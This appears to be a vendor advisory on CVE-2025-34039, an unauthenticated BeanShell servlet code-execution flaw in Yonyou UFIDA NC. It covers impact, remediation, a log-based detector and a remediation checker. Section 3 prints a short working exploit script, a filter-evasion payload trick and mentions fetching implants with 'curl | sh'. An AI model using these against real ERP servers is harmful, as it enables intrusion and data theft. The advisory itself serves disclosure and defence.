TL;DR
Any HTTP client that reaches /servlet/~ic/bsh.servlet.BshServlet on Yonyou UFIDA NC through 6.5 can send a bsh.script parameter with arbitrary Java. Because the application server runs under a privileged account in many on-premise ERP installs, successful exploitation often leads to full system compromise. A patch is available, and administrators who cannot upgrade should remove the servlet or block the path at the reverse proxy.
1. Summary
| Field | Value |
|---|---|
| CVE ID | CVE-2025-34039 |
| Affected Product(s) | Yonyou UFIDA NC ≤ 6.5 when the BeanShell test servlet is reachable |
| Volerion Risk Score | 7.5 / 10 |
| Exploit Status | Public PoC available |
| CISA KEV | No |
The vulnerability is a classic case of test code left in production. Yonyou ships the third-party BeanShell JAR, which exposes a servlet intended for interactive debugging. Because the servlet accepts a text field containing Java and returns the output, any internet-facing deployment becomes an easy target for initial access.
2. Context – why an ERP bug matters beyond accounting
Yonyou UFIDA NC is a flagship enterprise-resource-planning platform in Asia-Pacific. Customers integrate it with payroll, inventory and sometimes industrial control systems. When the application runs on-premise, administrators often assign it a dedicated Windows or Linux server and open HTTP/HTTPS so branch offices can connect. In practice that means the ERP host sits one firewall hop away from sensitive databases. A remote code execution flaw therefore offers attackers a fast lane to financial records and cached credentials.
Although the affected servlet belongs to the open-source BeanShell interpreter, the actual risk is amplified by the UFIDA NC deployment model. Installers run the JBoss-based application server as root (Linux) or SYSTEM (Windows) unless the operator manually lowers privileges. Once an attacker executes Java, they can spawn native commands or use reflection to disable security controls.
3. Technical Details – turning a help page into a reverse shell
The vulnerable endpoint lives at /servlet/~ic/bsh.servlet.BshServlet. It wires directly into BeanShell’s Interpreter.eval() without any authentication check. The servlet expects either a POST form field or GET parameter named bsh.script. Whatever text appears inside that parameter becomes part of the Java runtime.
A minimal exploit uses a single HTTP request. The following example opens a calculator on Windows, proving arbitrary command execution.
```python
# Exploit for CVE-2025-34039
import requests, sys, urllib.parse
target = sys.argv[1] # http://example.com:8080
payload = 'exec("calc.exe");' # Replace with bash commands on Linux
url = f"{target}/servlet/~ic/bsh.servlet.BshServlet"
data = {'bsh.script': payload}
r = requests.post(url, data=data, timeout=5)
print("Status:", r.status_code)
print("Response:", r.text[:200])
```
The interpreter runs in the same JVM as UFIDA NC, so using Runtime.getRuntime().exec() or BeanShell’s exec() helper spawns processes with the server user’s privileges. Attackers often chain the bug by retrieving a second-stage implant over HTTP and launching it with curl | sh or PowerShell.
Why WAF rules rarely help
BeanShell accepts both Java expressions and full class definitions. An attacker can break any naïve regular-expression filter by embedding whitespace, comments or string concatenation. For example, ex/*foo*/ec("whoami") passes most generic RCE signatures yet evaluates correctly.
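Because payload signatures are easy to defeat, detection is more robust when it keys on the request path rather than on the contents of bsh.script. The following is an added example, not part of the advisory or of any Volerion or Yonyou tooling: it scans web-server access-log lines in the common log format, normalises the request path (query string dropped, percent-decoding applied twice to catch double encoding, case folded) and flags anything aimed at the servlet. The log lines are constructed for the example and use RFC 5737 documentation addresses.

```python
# Added example, not part of the advisory: flag requests to the BeanShell servlet in
# web-server access logs by normalising the request path. Matching the path sidesteps
# the comment/whitespace tricks that defeat regex signatures on the bsh.script payload.
import re
from collections import Counter
from urllib.parse import unquote

# Servlet path named in the advisory, lower-cased for comparison.
BSH_SERVLET_PATH = "/servlet/~ic/bsh.servlet.bshservlet"

# Common/combined log format: client ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise_path(target: str) -> str:
    """Drop the query string, percent-decode twice (catches %257E double encoding),
    collapse repeated slashes and lower-case, so /servlet/%7Eic/... compares equal."""
    path = target.split("?", 1)[0]
    path = unquote(unquote(path))
    path = re.sub(r"/{2,}", "/", path)
    return path.lower()


def is_bsh_servlet_request(line: str):
    """Return a dict describing the request if it targets the servlet, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    if normalise_path(m.group("target")) != BSH_SERVLET_PATH:
        return None
    return {
        "client": m.group("client"),
        "time": m.group("time"),
        "method": m.group("method"),
        "status": int(m.group("status")),
        "target": m.group("target"),
    }


def scan_log(lines):
    """Return every hit; a 403/404 after blocking the path still shows someone probing."""
    return [hit for hit in map(is_bsh_servlet_request, lines) if hit]


def hits_by_client(hits):
    """Count hits per source address for a quick triage summary."""
    return Counter(h["client"] for h in hits)


# Constructed sample lines (RFC 5737 addresses); the query in line 2 is a harmless expression.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Jun/2025:10:01:02 +0000] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 200 512',
    '203.0.113.7 - - [23/Jun/2025:10:01:03 +0000] "GET /servlet/%7Eic/bsh.servlet.BshServlet?bsh.script=1%2B1 HTTP/1.1" 200 3',
    '203.0.113.7 - - [23/Jun/2025:10:01:04 +0000] "GET /servlet/%257Eic/bsh.servlet.BshServlet HTTP/1.1" 200 3',
    '198.51.100.9 - - [23/Jun/2025:10:05:00 +0000] "GET /SERVLET/~ic/BSH.SERVLET.BSHSERVLET HTTP/1.1" 404 0',
    '198.51.100.9 - - [23/Jun/2025:10:05:01 +0000] "GET /servlet/~ic/OtherServlet HTTP/1.1" 200 1024',
    '192.0.2.10 - - [23/Jun/2025:10:06:00 +0000] "GET /index.jsp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(hits_by_client(scan_log(SAMPLE_LOG)))
```

Of the six constructed lines, the first four are flagged (plain, percent-encoded, double-encoded and upper-cased variants of the path), including the 404, which after remediation is still worth alerting on because it shows the host is being probed. Decoding twice is deliberate: a reverse proxy that only decodes once may forward /servlet/%257Eic/ to the application server intact, and a log-side check should not be weaker than the server it protects.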
4. Impact – from ERP compromise to domain admin
Successful exploitation gives code execution inside the corporate ERP server. Typical attack paths include dumping stored database credentials from configuration files, installing web shells under the UFIDA deployment directory or pivoting to the domain controller via pass-the-hash if the server uses an elevated service account. In manufacturing environments the ERP suite sometimes interfaces directly with programmable logic controllers, opening the door to operational disruption.
Because exploitation requires only a single HTTP request and no authentication, mass scanning is trivial. The low EPSS of 0.00398 likely reflects limited global deployment, not technical difficulty.
5. Remediation – how to close the hole today
The safest option is to apply the vendor patch published through Yonyou’s UMC portal. The patch removes or guards the BeanShell servlet. Administrators should verify that ${NC_HOME}/modules/bshtest.jar is removed after the update.
If immediate patching is impossible:
- Block access to /servlet/~ic/bsh.servlet.BshServlet at the reverse proxy or web server.
- Delete the BeanShell JARs (bsh-*.jar) and restart the application server.
- Run UFIDA NC under a dedicated low-privilege account to limit post-exploitation damage.
Routine penetration tests should include a check for the servlet because administrators sometimes restore it during upgrades.
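The two checks the section asks for (the JAR is gone from the install root, and the servlet path no longer answers) can be scripted so they run after every upgrade. The following is an added example and not the vendor's patch tooling or Volerion's code: the ${NC_HOME} layout, the bshtest.jar and bsh-*.jar names and the servlet path come from the advisory text; the directory walk, the status-code interpretation and the command-line usage are assumptions. The probe sends a plain GET with no bsh.script parameter, so nothing is evaluated on the server.

```python
# Added example, not the vendor's or the advisory's own tooling: verify the remediation
# steps on a UFIDA NC host. The NC_HOME layout, the bshtest.jar / bsh-*.jar names and the
# servlet path come from the advisory text; everything else is an assumption.
import fnmatch
import os
import sys
import urllib.error
import urllib.request

BSH_SERVLET = "/servlet/~ic/bsh.servlet.BshServlet"
JAR_PATTERNS = ("bsh-*.jar", "bshtest.jar")


def select_bsh_jars(paths):
    """Filter an iterable of file paths down to BeanShell JARs (case-insensitive), sorted."""
    return sorted(
        p for p in paths
        if any(fnmatch.fnmatch(os.path.basename(p).lower(), pat) for pat in JAR_PATTERNS)
    )


def find_bsh_jars(nc_home):
    """Walk the install root and return every BeanShell JAR still on disk."""
    return select_bsh_jars(
        os.path.join(dirpath, name)
        for dirpath, _dirs, files in os.walk(nc_home)
        for name in files
    )


def servlet_status(base_url, timeout=5):
    """GET the servlet path with no bsh.script parameter and return the HTTP status.
    Nothing is evaluated server-side; a 403/404 shows the proxy or server block is in place.
    Returns None when the host cannot be reached."""
    req = urllib.request.Request(base_url.rstrip("/") + BSH_SERVLET, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code
    except (urllib.error.URLError, OSError):
        return None


def remediation_report(jars, status):
    """Combine the two checks. The path counts as closed only on 403/404; a 200 (or
    any other answer, including an unreachable host) means the block is not confirmed."""
    return {
        "jars_removed": not jars,
        "remaining_jars": list(jars),
        "path_closed": status in (403, 404),
        "servlet_status": status,
        "remediated": not jars and status in (403, 404),
    }


if __name__ == "__main__":
    # usage: python3 check_nc.py /opt/nc http://erp.example.internal:8080  (hypothetical paths)
    nc_home, base_url = sys.argv[1], sys.argv[2]
    report = remediation_report(find_bsh_jars(nc_home), servlet_status(base_url))
    for key, value in report.items():
        print(f"{key}: {value}")
```

Both conditions must hold before the host is reported as remediated: a 404 from the reverse proxy while bsh-*.jar is still on disk means the servlet will come back the moment the proxy rule is lost, and a removed JAR with the path still answering 200 means something else is serving that URL and needs a look.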
6. Timeline
| Date (UTC) | Milestone |
|---|---|
| 2025-06-23 | CVE-2025-34039 published |
| 2025-06-23 | Volerion completes enrichment and publishes risk score |
7. References
- VulnCheck advisory – Yonyou UFIDA NC BeanShell Code Injection: https://vulncheck.com/advisories/yonyou-ufida-nc-beanshell-code-injection
- CNBlogs technical write-up and exploit: https://www.cnblogs.com/pursue-security/p/17685141.html
- CNVD entry CNVD-2021-30167: https://www.cnvd.org.cn/flaw/show/CNVD-2021-30167
- Official patch download (login required): http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19
About Volerion
Volerion delivers AI-driven enrichment minutes after a CVE goes live. A single call to our REST API returns CVSS 4.0 vectors, exploitability metrics and affected products complete with remediation. Additionally, we offer different scoring profiles, complete with insight into the eight comprehensive categories that make up the final score. Our API is also available in the traditional NVD API 2.0 format, so integration is as simple as swapping hosts. Spend less time parsing CVEs and more time closing them.
How the Volerion Risk Score Fits With CVSS, EPSS and KEV
At the time of writing:
- This CVE is scored at 10.0 using CVSS 3.1, which reflects maximum impact and minimal attacker effort. CVSS is useful for understanding technical severity but does not factor in real-world exploitation likelihood.
- EPSS assigns a score of 0.00398, suggesting a low probability that the vulnerability will be exploited within the next 30 days. The score is influenced by deployment scale rather than difficulty.
- CISA’s KEV list does not include the issue, meaning federal agencies are not under a binding directive to patch.
The Volerion Risk Score brings these signals together and layers them with additional factors such as affected product prevalence, exploit maturity and remediation effort. For CVE-2025-34039 the score is 7.5, landing in our high-risk band because the vulnerability allows unauthenticated RCE even though global deployment is limited.